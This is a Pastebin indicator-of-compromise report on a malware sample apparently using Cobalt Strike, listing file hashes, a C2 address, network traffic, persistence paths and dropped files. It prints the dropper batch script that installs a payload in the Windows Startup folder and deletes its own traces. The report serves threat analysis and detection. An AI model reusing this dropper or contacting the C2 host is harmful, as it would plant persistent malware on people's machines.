Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #IOC #OptiData #VR #cobaltstrike #SFX #BAT
- https://pastebin.com/hbxkBA9n
- FAQ:
- https://www.cobaltstrike.com/features
- https://www.youtube.com/watch?v=rqOG_oyYbvs
- https://pypi.org/project/pyconfig/
- https://blog.cobaltstrike.com/2014/06/12/cobalt-strike-innovative-offense-or-just-a-gui/
- attack_vector
- --------------
- EXE (SFX) > .bat > Startup\explorer.exe
- email_headers
- --------------
- n/a
- files
- --------------
- SHA-256 fb7f4162ee59ee2b23606bb50c560a8010df95d3746c79b13f8200de05e934ad
- File name explorer.exe
- File size 4.58 MB (4797547 bytes)
- SHA-256 1acb5b19209c8b11aceb40b5d5da4a53505f1180bd0e0ea1886c8b8159af35b1
- File name Nd9q
- File size 205.09 KB (210011 bytes)
- SHA-256 2f16567c59e964e2eb583a1aa749a08255db10685b087b2dffc154d165f4f4e9
- File name pyconfig.h
- File size 21.31 KB (21821 bytes)
- SHA-256 ce559f72bf1fc7b72f3db4b814320d3902f607098c06141901277a07976b59f7
- File name python34.dll
- File size 2.62 MB (2744832 bytes)
- activity
- **************
- bat_file
- --------------
- @echo off
- copy explorer.exe "%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup"
- cd "%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\"
- start explorer.exe
- cd %~dp0
- del 1.rar.exe
- del explorer.exe
- del link_site.bat
- exit
- C2:
- http://185.25.50.168:4444/Nd9q
- netwrk
- --------------
- 185.25.50.168 185.25.50.168:4444 GET /Nd9q HTTP/1.1 Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1;)
- 185.25.50.168 185.25.50.168:4444 GET /cx HTTP/1.1 Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1;)
- 185.25.50.168 185.25.50.168:4444 GET /cx HTTP/1.1 Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1;)
- comp
- --------------
- explorer.exe 1236 TCP localhost 50093 185.25.50.168 4444 CLOSE_WAIT
- proc
- --------------
- C:\Windows\system32\cmd.exe cmd /c ""C:\Users\operator\Desktop\1\link_site.bat" "
- C:\Users\operator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\explorer.exe
- C:\Users\operator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\explorer.exe
- persist
- --------------
- C:\Users\operator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup 19.03.2019 15:59
- explorer.exe
- c:\users\operator\appdata\roaming\microsoft\windows\start menu\programs\startup\explorer.exe 01.01.1970 2:00
- drop
- --------------
- C:\Users\operator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\explorer.exe
- %temp%\_MEI22402\Include\pyconfig.h
- %temp%\_MEI22402\python34.dll
- %temp%\_MEI22402\MSVCR100.dll
- %temp%\_MEI22402\_ssl.pyd
- %temp%\_MEI22402\_socket.pyd
- %temp%\_MEI22402\unicodedata.pyd
- %temp%\_MEI22402\unicodedata.pyd
- %temp%\_MEI22402\...
- # # #
- VR
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement